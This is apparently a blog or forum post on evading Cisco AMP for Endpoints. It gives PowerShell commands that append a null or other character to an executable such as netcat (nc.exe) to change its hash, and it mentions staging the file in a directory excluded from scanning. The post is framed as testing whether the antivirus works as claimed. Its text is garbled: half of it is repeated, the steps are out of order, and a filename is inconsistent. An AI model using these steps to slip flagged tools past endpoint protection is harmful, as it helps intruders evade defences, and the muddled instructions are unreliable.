Bypassing Antivirus ( Cisco AMP for endpoint)
Dear All,
Its been a while that we have not updated this forum.
Today we will talk about the AV bypassing or to check if your antivirus is really what they are claiming,
So i have start testing the CISCO AMP for endpoint, it was detecting the netcat file (nc.exe) as a remote monitoring tool and was keep on deleting it.
To bypass the AV i copied the nc.exe to an excluded directory which i already knew. Or in your case you have to perform below actions on a VM or another machine which do not have Cisco AMP installed.
So lets start the bypassing process.
We will assume that we copy our nc.exe in below directory:
C:\excluded\
Hit enter
You are all good. This executable will not be detected by Cisco AMP.
I have identified few more characters you can add to your executable.
`0 -- Null
`a -- Alert
`b -- Backspace
`n -- New line
`r -- Carriage return
`t -- Horizontal tab
`' -- Single quote
`" -- Double quote
Its been a while that we have not updated this forum.
Today we will talk about the AV bypassing or to check if your antivirus is really what they are claiming,
So i have start testing the CISCO AMP for endpoint, it was detecting the netcat file (nc.exe) as a remote monitoring tool and was keep on deleting it.
To bypass the AV i copied the nc.exe to an excluded directory which i already knew. Or in your case you have to perform below actions on a VM or another machine which do not have Cisco AMP installed.
So lets start the bypassing process.
We will assume that we copy our nc.exe in below directory:
C:\excluded\
- Open powershell (by press windows+R button and type powershell).
Move to excluded directory in powershell
- cd C:\excluded\
Type following commands in power shell. Replace the test.exe with the your exe name which you want not to detected by Antivirus.
- Get-FileHash -Path '.\test.exe' -Algorithm SHA256 (1st note the hash)
- add-Content -Path '.\text.exe' -Value "`0" -NoNewline
-
add-content '.\test.exe' `0
Hit enter
You are all good. This executable will not be detected by Cisco AMP.
I have identified few more characters you can add to your executable.
`0 -- Null
`a -- Alert
`b -- Backspace
`n -- New line
`r -- Carriage return
`t -- Horizontal tab
`' -- Single quote
`" -- Double quote
Comments
Post a Comment